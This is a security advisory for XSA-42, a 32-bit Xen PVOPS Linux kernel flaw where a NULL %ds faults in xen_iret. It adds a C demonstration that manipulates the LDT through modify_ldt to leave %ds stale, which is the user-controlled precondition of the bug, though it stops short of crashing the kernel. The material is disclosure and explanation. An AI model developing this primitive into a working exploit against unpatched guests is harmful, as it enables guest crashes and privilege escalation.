XSA-42 (Xen Project)

Linux kernel hits general protection if %ds is corrupt for 32-bit PVOPS.

Published: Feb 12, 2013, 12:00 p.m.
Source: Xen Project, xenbits.xen.org
CVSS2: 6.2 Medium (AV:L/AC:H/Au:N/C:C/I:C/A:C)
Attack Vector: LOCAL; Attack Complexity: HIGH; Authentication: NONE
Confidentiality Impact: COMPLETE; Integrity Impact: COMPLETE; Availability Impact: COMPLETE

EPSS: 0.002 (Low), percentile 64.8%

ISSUE DESCRIPTION

The Linux kernel, when returning to user space through iret, assumes that the %ds segment register is safe to use and dereferences it to reach various per-cpu fields. Unfortunately an unprivileged user can modify the LDT and leave the kernel with a NULL %ds. Whenever an iret is executed on a PVOPS kernel, control ends up in xen_iret, which tries to use the %ds segment and takes a general protection fault in kernel mode.
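The premise of the issue, that unprivileged code can move %ds onto an LDT entry of its own and then take that entry away again, can be checked from user space on any Linux/x86 system. The program below is an added example, not code from the advisory, the Linux kernel or the Xen project, and it does not trigger the crash (that needs the unpatched xen_iret of a 32-bit PVOPS guest); it only shows the segment state the kernel's return path is handed. The LDT entry index, the flat data-segment layout and the names ds_demo/run_ds_demo are choices made here, and the reading that the kernel's own %ds-restore fixup is what produces the NULL %ds is an assumption of this example, not a statement from the advisory.

```c
/* Added example, not Xen/Linux code. Installs an LDT entry with
 * modify_ldt(2), loads it into %ds, clears the entry again, and reports
 * what %ds looks like afterwards. Assumption (not from the advisory): the
 * kernel's segment-restore fixup is what turns such a stale %ds into 0. */
#define _GNU_SOURCE
#include <asm/ldt.h>
#include <setjmp.h>
#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/syscall.h>
#include <unistd.h>

struct ds_demo {
    int ldt_ok;                   /* 1 if modify_ldt(2) accepted our entry */
    uint16_t sel;                 /* selector built for the LDT entry */
    uint16_t ds_after_load;       /* %ds read back right after loading sel */
    uint16_t ds_after_invalidate; /* %ds after the LDT entry was cleared */
    int reload_signal;            /* signal raised by reloading sel (0 = none) */
};

static sigjmp_buf fault_env;
static volatile sig_atomic_t fault_signo;

static void on_fault(int signo) {
    fault_signo = signo;
    siglongjmp(fault_env, 1);
}

/* Selector for LDT entry `index`: index << 3, TI = 1 (LDT), RPL = 3. */
uint16_t ldt_selector(unsigned index) {
    return (uint16_t)((index << 3) | 0x4 | 0x3);
}

/* Write LDT entry `index` as a flat 32-bit read/write data segment
 * (present == 1) or clear it to an all-zero descriptor (present == 0; the
 * clear pattern is the one Linux's write_ldt() treats as "empty").
 * Returns 0 on success, -1 with errno set on failure. */
int set_ldt_entry(unsigned index, int present) {
    struct user_desc d;
    memset(&d, 0, sizeof d);
    d.entry_number = index;
    if (present) {
        d.limit = 0xfffff;
        d.seg_32bit = 1;
        d.limit_in_pages = 1;
        d.useable = 1;
    } else {
        d.read_exec_only = 1;
        d.seg_not_present = 1;
    }
    /* func 1: write one LDT entry (see modify_ldt(2)) */
    if (syscall(SYS_modify_ldt, 1, &d, sizeof d) < 0)
        return -1;
    return 0;
}

static uint16_t read_ds(void) {
    uint16_t v;
    __asm__ volatile("mov %%ds, %0" : "=r"(v));
    return v;
}

static void load_ds(uint16_t sel) {
    __asm__ volatile("mov %0, %%ds" : : "r"(sel) : "memory");
}

struct ds_demo run_ds_demo(unsigned index) {
    struct ds_demo r;
    struct sigaction sa, old_segv, old_bus;
    uint16_t orig_ds = read_ds();
    memset(&r, 0, sizeof r);

    r.sel = ldt_selector(index);
    if (set_ldt_entry(index, 1) != 0) {
        perror("modify_ldt");
        return r;
    }
    r.ldt_ok = 1;

    /* Point %ds at our own LDT entry; the CPU caches the descriptor. */
    load_ds(r.sel);
    r.ds_after_load = read_ds();

    /* Clear the entry behind %ds. We keep running on the cached descriptor,
     * but the kernel can no longer reload this selector: a 32-bit kernel
     * pops %ds on every return to user space and its fault fixup substitutes
     * 0 (the NULL %ds the advisory refers to); a 64-bit kernel only reloads
     * %ds on a context switch, so here it may still read back as sel. */
    set_ldt_entry(index, 0);
    r.ds_after_invalidate = read_ds();

    /* Reloading the stale selector ourselves faults (#GP for an all-zero
     * descriptor, #NP for a not-present one), delivered as SIGSEGV/SIGBUS. */
    memset(&sa, 0, sizeof sa);
    sa.sa_handler = on_fault;
    sigemptyset(&sa.sa_mask);
    sigaction(SIGSEGV, &sa, &old_segv);
    sigaction(SIGBUS, &sa, &old_bus);
    fault_signo = 0;
    if (sigsetjmp(fault_env, 1) == 0)
        load_ds(r.sel);
    r.reload_signal = fault_signo;
    sigaction(SIGSEGV, &old_segv, NULL);
    sigaction(SIGBUS, &old_bus, NULL);

    load_ds(orig_ds); /* back to the kernel's default user %ds */
    return r;
}

int main(void) {
    struct ds_demo r = run_ds_demo(0);
    if (!r.ldt_ok)
        return 1;
    printf("selector 0x%x, ds after load 0x%x, after LDT clear 0x%x, reload -> signal %d\n",
           r.sel, r.ds_after_load, r.ds_after_invalidate, r.reload_signal);
    return 0;
}
```

On a fixed kernel the process survives every step because the kernel's return path now addresses its per-cpu data through %ss rather than the user-controlled %ds; the point of the advisory is that the unpatched 32-bit PVOPS xen_iret did not, so the NULL or stale %ds shown here was dereferenced in kernel mode.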

IMPACT

Malicious or buggy unprivileged user space can cause the guest kernel to crash, permit a privilege escalation within the guest, or make the kernel operate erroneously.

VULNERABLE SYSTEMS

All 32-bit PVOPS versions of Linux are affected, since the introduction of Xen PVOPS support in 2.6.23. Classic-Xen kernels are not vulnerable. A guest is in scope when its kernel is 32-bit (uname -m reports i686 or similar) and it booted as a Xen PV guest, which a PVOPS kernel logs at boot as "Booting paravirtualized kernel on Xen".
